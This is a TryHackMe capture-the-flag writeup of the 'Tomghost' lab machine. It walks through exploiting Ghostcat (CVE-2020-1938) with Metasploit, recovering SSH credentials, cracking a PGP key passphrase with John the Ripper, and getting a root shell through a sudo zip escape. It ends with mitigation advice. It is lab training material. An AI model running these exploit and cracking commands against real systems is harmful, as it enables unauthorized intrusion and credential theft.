Post

Tomghost

Exploit Ghostcat vulnerability (CVE-2020-1938) on Apache Tomcat, decrypt PGP credentials, and escalate privileges via sudo zip misconfiguration.

Posted Updated
Preview Image
By Mustafa Eltayeb
3 min read
Tomghost

Tomghost - TryHackMe Writeup

Tomghost is an intermediate CTF machine that demonstrates the exploitation of the Ghostcat vulnerability in Apache Tomcat, followed by PGP credential decryption and sudo privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Linux (Ubuntu 16.04)
Themes: AJP Protocol Exploitation, PGP Decryption, Sudo Misconfiguration

Objectives

  1. Identify and exploit the Ghostcat vulnerability (CVE-2020-1938)
  2. Extract and decrypt PGP-protected credentials
  3. Gain SSH access and perform lateral movement
  4. Escalate privileges through sudo zip misconfiguration
  5. Capture user and root flags

Reconnaissance

Nmap Scan

Comprehensive port scanning to identify attack surfaces:

1

nmap -sCV -p- -T4 -oA nmap_tomghost 10.10.182.213

Results:

1
2
3
4
5
6

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Key Findings:

  • Port 22: SSH service (potential for credential reuse)
  • Port 8009: AJP/1.3 protocol (vulnerable to Ghostcat)
  • Port 8080: Apache Tomcat 9.0.30 (outdated version)

Initial Exploitation

Ghostcat Vulnerability (CVE-2020-1938)

The open AJP port (8009) on Apache Tomcat is vulnerable to the Ghostcat vulnerability, allowing arbitrary file read from the web application.

Metasploit Exploitation:

1
2
3
4
5

msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 > set RHOSTS 10.10.182.213
msf6 > set RPORT 8009
msf6 > set FILENAME /WEB-INF/web.xml
msf6 > run

Extracted Credentials: From the /WEB-INF/web.xml file:

1

skyfuck:8730281lkjlkjdqlksalks

SSH Access Gained

1
2

ssh skyfuck@10.10.182.213
Password: 8730281lkjlkjdqlksalks

Initial Access: User skyfuck

Lateral Movement

User Flag Discovery

1
2

skyfuck@ubuntu:/home/merlin$ cat user.txt
THM{GhostCat_1s_so_cr4sy}

PGP File Discovery

Found in skyfuck’s home directory:

1
2

ls /home/skyfuck/
credential.pgp  tryhackme.asc

File Analysis:

  • tryhackme.asc: PGP private key file
  • credential.pgp: Encrypted credential file

File Transfer to Attacker Machine

Setup HTTP server on target:

1

python3 -m http.server 8000

Download on attacker machine:

1
2

wget http://10.10.182.213:8000/credential.pgp
wget http://10.10.182.213:8000/tryhackme.asc

PGP Private Key Cracking

  1. Convert to John format:
    1

    gpg2john tryhackme.asc > hash.txt
  2. Crack with JohnTheRipper:
    1

    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Passphrase Found: alexandru

Credential Decryption

  1. Import private key:
    1

    gpg --import tryhackme.asc
  2. Decrypt credential file:
    1

    gpg --decrypt credential.pgp

Decrypted Credentials:

1

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j#

User Switching

1
2
3

skyfuck@ubuntu:~$ su merlin
Password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j#
merlin@ubuntu:~$

Privilege Escalation

Sudo Privilege Enumeration

1

sudo -l

Critical Finding:

1
2

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Zip Sudo Exploitation

Using the technique from GTFOBins:

1
2
3
4
5

# Create temporary file
TF=$(mktemp -u)

# Exploit zip command with shell injection
sudo zip $TF /etc/hosts -T -TT 'sh #'

Root Shell Obtained:

1
2

# whoami
root

Root Flag Capture

1
2

cat /root/root.txt
THM{Z1P_1S_FAKE}

Key Takeaways

Attack Path Summary:

1
2
3
4
5

Port Scanning → Ghostcat Vulnerability Discovery → 
AJP Protocol Exploitation → Credential Extraction → 
SSH Access → PGP File Discovery → Private Key Cracking → 
Credential Decryption → Lateral Movement → 
Sudo Privilege Enumeration → Zip Exploitation → Root Access

Vulnerabilities Exploited:

  1. CVE-2020-1938 (Ghostcat) - Arbitrary file read via AJP protocol
  2. Weak Password Storage - Credentials in web.xml file
  3. PGP Passphrase Weakness - Crackable passphrase
  4. Sudo Misconfiguration - Unrestricted zip command execution

Mitigation Strategies:

  1. For Apache Tomcat Security:
    • Update to latest Tomcat version
    • Close AJP port if not required
    • Implement network segmentation
    • Regular security patching
  2. For Credential Security:
    • Secure storage of sensitive data
    • Strong PGP passphrases
    • Avoid storing credentials in configuration files
    • Regular credential rotation
  3. For Linux Security:
    • Principle of least privilege for sudo access
    • Regular audit of sudo permissions
    • Restrict dangerous binaries in sudoers
    • Implement SELinux/AppArmor
  4. For PGP Security:
    • Use strong passphrases (20+ characters)
    • Regular key rotation
    • Secure key storage
    • Implement key escrow procedures

Tools Used:

  • Nmap - Port scanning and service enumeration
  • Metasploit - Ghostcat vulnerability exploitation
  • JohnTheRipper - PGP passphrase cracking
  • GPG - PGP file decryption
  • GTFOBins - Privilege escalation reference

Timeline of Events:

  1. Initial Reconnaissance - Port scanning and service identification
  2. Vulnerability Exploitation - Ghostcat attack on AJP port
  3. Credential Discovery - Extraction from web.xml
  4. Initial Access - SSH login as skyfuck
  5. Lateral Movement - PGP decryption and user switching
  6. Privilege Escalation - Sudo zip exploitation
  7. Flag Capture - User and root flags obtained

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

tryhackme
TryHackMe CVE-2020-1938 Ghostcat PGP Decryption Sudo Privilege Escalation Zip Exploitation Linux
This post is licensed under CC BY 4.0 by the author.